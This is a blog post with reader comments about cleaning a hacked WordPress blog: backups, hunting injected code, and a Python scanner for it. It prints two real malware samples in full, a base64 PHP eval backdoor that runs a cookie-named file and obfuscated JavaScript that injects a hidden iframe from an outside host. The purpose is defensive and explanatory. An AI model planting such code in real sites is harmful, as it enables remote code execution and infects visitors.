What to do when your blog has a virus
- May 1, 2009 by Emanuele Feronato
- Filed under WordPress | 11 Comments
The last time my blog was hacked was… let me remember… uh… yesterday.
But hackers have known my blog for quite a long time, and they even got my blog marked by Google as a site that may harm your computer.
Never mind, all these attacks gave me some experience with the typical WordPress hack.
So, when you realize your blog has been hacked, follow these steps:
Back up your FTP content
Simply open your favorite FTP client and download all the content of your site.
Back up your MySQL database
Every decent hosting plan now supports phpMyAdmin. With this tool you can export and save your entire database in a matter of seconds (or minutes, depending on the size of your DB).
With your WP database selected, click on Export (1).
On the next page, remember to:
1) Have all tables selected
2) Select SQL as database type
3) Check Structure, Add IF NOT EXISTS and Enclose table and field names with backquotes. Leave Add AUTO_INCREMENT value unchecked, because WP tables already have an auto increment column.
4) Check Data, Complete inserts, Extended inserts and Use hexadecimal for BLOB.
5) Check Save as file and None. Choosing zipped can be too CPU intensive for your hosting plan.
Hunt for the virus
I experienced two types of viruses, both of which inserted code into my WP files.
The first one is PHP code inserted in one page, like this one:
eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));
which, once decoded, is:
if(isset($_COOKIE["sh"])){include($_COOKIE["sh"]);exit;}
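This is a backdoor: any request that carries a cookie named sh makes the page include, and so execute, whatever file that cookie names.
The second one is JavaScript code inserted in one page, like this one: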
var OymMAWPnBMGWAGuoPiVY = "q60q105q102q114q97q109q101q32q119q105q100q116q104q61q34q52q56q48q34q32q104q101q105q103q104q116q61q34q54q48q34q32q115q114q99q61q34q104q116q116q112q58q47q47q105q108q111q118q101q104q97q115q104q46q99q110q47q114q97q115q116q97q116q100q115q47q103q111q46q112q104q112q63q115q105q100q61q53q34q32q115q116q121q108q101q61q34q98q111q114q100q101q114q58q48q112q120q59q32q112q111q115q105q116q105q111q110q58q114q101q108q97q116q105q118q101q59q32q116q111q112q58q48q112q120q59q32q108q101q102q116q58q45q53q48q48q112q120q59q32q111q112q97q99q105q116q121q58q48q59q32q102q105q108q116q101q114q58q112q114q111q103q105q100q58q68q88q73q109q97q103q101q84q114q97q110q115q102q111q114q109q46q77q105q99q114q111q115q111q102q116q46q65q108q112q104q97q40q111q112q97q99q105q116q121q61q48q41q59q32q45q109q111q122q45q111q112q97q99q105q116q121q58q48q34q62q60q47q105q102q114q97q109q101q62";var LtBVGDCUsUSHTFUTcjHd = OymMAWPnBMGWAGuoPiVY.split("q");var wOAwUuljcGInzJIGNLaG = "";for (var gtNzyhTaRbENpEKKzvub=1; gtNzyhTaRbENpEKKzvub<LtBVGDCUsUSHTFUTcjHd.length; gtNzyhTaRbENpEKKzvub++){wOAwUuljcGInzJIGNLaG+=String.fromCharCode(LtBVGDCUsUSHTFUTcjHd[gtNzyhTaRbENpEKKzvub]);}document.write(wOAwUuljcGInzJIGNLaG)
which, once run, writes this hidden iframe into the page:
<iframe width="480" height="60" src="http://ilovehash.cn/rastatds/go.php?sid=5" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
I found more similar code injected in my pages, but all of it had been inserted at the end of the page, on the last line.
So you should search for eval or document.write and see if there are strange strings like the ones I got.
Then delete them or comment them out, and your blog should be clean and virus-free.
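The search described above can be scripted against the files downloaded in the FTP backup step. The Python below is an added example, not code from this post or from any plugin it mentions; the function names and the sample page are assumptions made for illustration. It finds the two patterns shown above, decodes them without executing anything, and notes whether each one sits on the last line of the file.

```python
import base64
import os
import re

# eval(base64_decode('...')), the PHP pattern shown above
PHP_EVAL = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# A quoted run of delimiter-separated decimal char codes, e.g. "q60q105q102"
JS_CODES = re.compile(r"[\"']((?:([A-Za-z])\d{2,3})(?:\2\d{2,3}){2,})[\"']")

def decode_b64(blob):
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # malformed base64: report the raw string instead
        return blob

def scan_text(text):
    """Return one dict per suspicious string, with its decoded content."""
    lines = text.splitlines()
    last = max((n for n, l in enumerate(lines, 1) if l.strip()), default=0)
    found = []
    for no, line in enumerate(lines, 1):
        hits = [("php-eval-base64", decode_b64(m.group(1)))
                for m in PHP_EVAL.finditer(line)]
        for m in JS_CODES.finditer(line):
            codes = m.group(1).split(m.group(2))[1:]
            hits.append(("js-charcodes", "".join(chr(int(c)) for c in codes)))
        found += [{"line": no, "kind": k, "decoded": d, "last_line": no == last}
                  for k, d in hits]
    return found

def scan_tree(root, exts=(".php", ".js", ".html")):
    """Scan a downloaded copy of the site; returns {path: findings}."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(exts)):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[path] = hits
    return report

# Constructed sample (added example); the base64 string is the one quoted above
SAMPLE = (
    "<?php get_header(); echo eval_rating($post); ?>\n"
    '<script>var s = "q60q98q62q111q107q60q47q98q62";</script>\n'
    "<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30=')); ?>\n"
)
```

Run scan_tree on the downloaded backup rather than the live site, and read each decoded string before deleting anything. An empty report only means these two patterns are absent.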
I am thinking about making a plugin that does all this hard work for you. At the moment the only existing one seems to be WordPress Exploit Scanner, but I would like something more complete.
11 Responses
Or just use Blogger.com … ? Personally, I hate WordPress and stopped hosting my own blog ages ago because of how much of a PITA it became.
That’s the downside of using a well known application like WordPress, but WordPress is just awesome.
But how do they insert the code in the PHP file? I mean, to edit the PHP file they must have access to the OS (or FTP), or don’t they?
Wow, let me know: does the virus only attack WordPress? Thanks a lot for the tool to cure the virus.
Damn hacker!
I’ve run dozens of WordPress sites and never had an issue. But then I pay attention to securing them in the first place.
- Don’t use shared hosting, and if you must, pay very close attention to write permissions on files and directories.
- Don’t use the wp- prefix on directories or database
- htaccess the admin directory with a password or IP restriction
- Install as few plugins as possible and never install obscure ones.
- Keep everything updated
- Remove the meta generator WordPress version from header and themes
Wow, thanks for the tips, Mike D! :)
There is a difference between a “hacker” and a “cracker”. A hacker is a nice person who finds these “bugs” and “loopholes” to stop the evil “crackers” from causing damage. Why do they do it? The n00b crackers (script kiddies) do it so they can be “cool” and look like a “pro”; sadly they find the software on the net and use it XD. Please don’t get the terms mixed up!
My website (http://www.lizardproductions.net/) recently got a threatening message from a supposed “hacker” on the main page… I’m only 13 years old and I don’t know much about Dreamweaver, apart from how to make templates and pages and upload them to the server… Has anybody got some tips on how I might be able to prevent my site from possibly being hacked?
@Brindy: Depends on your need. I can’t stand blogger.com, where you never have full control, and if you just want to change a little thing in the layout it is extremely painful. Wonder what clients would say if you told them “meh, get a blogger-blog instead!” ;)
@Emanuele and others: Great tips, never had a problem so far but I’m going to have an extra look through my blogs now :)
@Emanuele Feronato: Thanks for sharing… Useful tips.
@swineinflu: No, these malicious threats will not only affect WordPress blogs. Their main entrance is PHP. If you are using PHP on your site, it will affect your PHP code and it will insert malicious code.
If your host has good security software or a firewall on their server, no need to worry. Otherwise you need to survive with these threats.
My website was recently hacked, and a malicious worm file distributed itself to all my folders which had perms of at least 755, and even some which did not (idk how, and idc.)
Emanuele, I found out the creator of the script. I will not post their username here however, just in case….
The script is quite nasty, it does basically everything I am afraid of to my files.
Fortunately, it seems whoever left the files on there forgot about em and never ran it.
I have a safe backup.
Can you help me determine the cause of my getting this and how to prevent it? The file is a php one, so I saw in the comments who made it. Would simply blacklisting the script name on the server itself prevent its execution?
PLEASE email me about this, you are the best person for me to ask.